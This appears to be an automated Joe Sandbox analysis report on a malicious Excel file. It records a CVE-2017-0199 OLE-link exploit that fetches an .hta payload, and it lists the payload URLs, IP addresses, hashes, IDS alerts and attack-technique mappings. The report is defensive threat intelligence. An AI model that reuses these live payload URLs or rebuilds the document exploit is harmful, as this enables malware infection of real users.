Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
Analysis ID:1541459
MD5:3d36155c4af65b9dd19c7da9ed0461dd
SHA1:5ba7e33fbc5c6d208daaf5665176defb13aa1c65
SHA256:1078b2b307b35167121d518c004f8403f4d52bdb41c9f399fa141bf3a6f3c4ae
Tags:xlsx
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3288 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 24.199.88.84, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-24T21:19:25.879708+020020244491Attempted User Privilege Gain192.168.2.2249162107.175.113.21480TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxReversingLabs: Detection: 45%
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: global trafficDNS query: name: u4u.kids
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: Joe Sandbox ViewIP Address: 24.199.88.84 24.199.88.84
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.175.113.214:80
Source: global trafficHTTP traffic detected: GET /n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.113.214
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51302D8.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: u4u.kids
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:19:25 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 107.175.113.214 Port 80</address></body></html>
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx, EC130000.0.drString found in binary or memory: https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famo
Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

barindex
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxOLE: Microsoft Excel 2007+
Source: EC130000.0.drOLE: Microsoft Excel 2007+
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxStream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W
Source: EC130000.0.drStream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W
Source: classification engineClassification label: mal56.winXLSX@1/7@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8AE0.tmpJump to behavior
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxOLE indicator, Workbook stream: true
Source: EC130000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxReversingLabs: Detection: 45%
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: EC130000.0.drInitial sample: OLE indicators vbamacros = False
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxStream path 'Workbook' entropy: 7.9744732217 (max. 8.0)
Source: EC130000.0.drStream path 'Workbook' entropy: 7.97390903279 (max. 8.0)
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
Path Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx46%ReversingLabsWin32.Exploit.CVE-2017-0199
SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
u4u.kids
24.199.88.84
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printerfalse
      unknown
      http://107.175.113.214/xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.htafalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famoSecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx, EC130000.0.drfalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          24.199.88.84
          u4u.kidsUnited States
          12271TWC-12271-NYCUSfalse
          107.175.113.214
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1541459
          Start date and time:2024-10-24 21:18:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 6s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:5
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
          Detection:MAL
          Classification:mal56.winXLSX@1/7@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          24.199.88.84A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
            PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                Logs.xlsGet hashmaliciousLokibotBrowse
                  Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                    InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      u4u.kidsA & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                      • 24.199.88.84
                      Logs.xlsGet hashmaliciousLokibotBrowse
                      • 24.199.88.84
                      Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                      • 24.199.88.84
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      AS-COLOCROSSINGUSSupplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                      • 192.210.150.14
                      bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                      • 192.210.187.71
                      bot.arm.elfGet hashmaliciousMirai, OkiruBrowse
                      • 192.210.187.71
                      bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                      • 192.210.187.71
                      transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 107.172.31.13
                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                      • 192.3.216.142
                      Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 198.46.178.134
                      Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                      • 192.3.176.141
                      A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                      • 192.210.215.8
                      #PO247762.docxGet hashmaliciousRemcosBrowse
                      • 104.168.7.51
                      TWC-12271-NYCUSla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                      • 208.105.50.172
                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                      • 67.254.163.163
                      A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                      • 24.168.15.31
                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                      • 24.90.165.8
                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                      • 98.7.19.218
                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                      • 98.7.19.218
                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                      • 67.244.124.183
                      PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                      • 24.199.88.84
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      7dcce5b76c8b17472d024758970a406bREVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 24.199.88.84
                      Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                      • 24.199.88.84
                      A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      #PO247762.docxGet hashmaliciousRemcosBrowse
                      • 24.199.88.84
                      PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                      • 24.199.88.84
                      Logs.xlsGet hashmaliciousLokibotBrowse
                      • 24.199.88.84
                      Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                      • 24.199.88.84
                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                      • 24.199.88.84
                      EX0096959.docx.docGet hashmaliciousRemcosBrowse
                      • 24.199.88.84
                      No context
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):172076
                      Entropy (8bit):3.1342558498505824
                      Encrypted:false
                      SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                      MD5:D85DAC1376E45C58F790BD50C2729F6C
                      SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                      SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                      SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                      Malicious:false
                      Reputation:low
                      Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:19:41 2024, Security: 1
                      Category:dropped
                      Size (bytes):91648
                      Entropy (8bit):7.796999868317942
                      Encrypted:false
                      SSDEEP:1536:6iqHy1S6F8b2SQrEkawpoXIoHwfElrGQZemz70I4:KeFHrE2sIoHtlqMee7u
                      MD5:4D97A355B272A53AF68A87914823EB4F
                      SHA1:4463F5CD5EEDBF7F5752C2B4F848548F3AC5AA75
                      SHA-256:CC7C12F515395FE1836243BE253C006E040EBA454684E52B14DFB7404AE9B678
                      SHA-512:135F18A3FCC5EAC777D53176C1A121A4785A99DAE49DB072ACE5F6EA68AA919EC82E26C3CCD38174E0D2D7B70A68EE25DF2F54C0498FB42F3E8DE42F2A103CB1
                      Malicious:false
                      Reputation:low
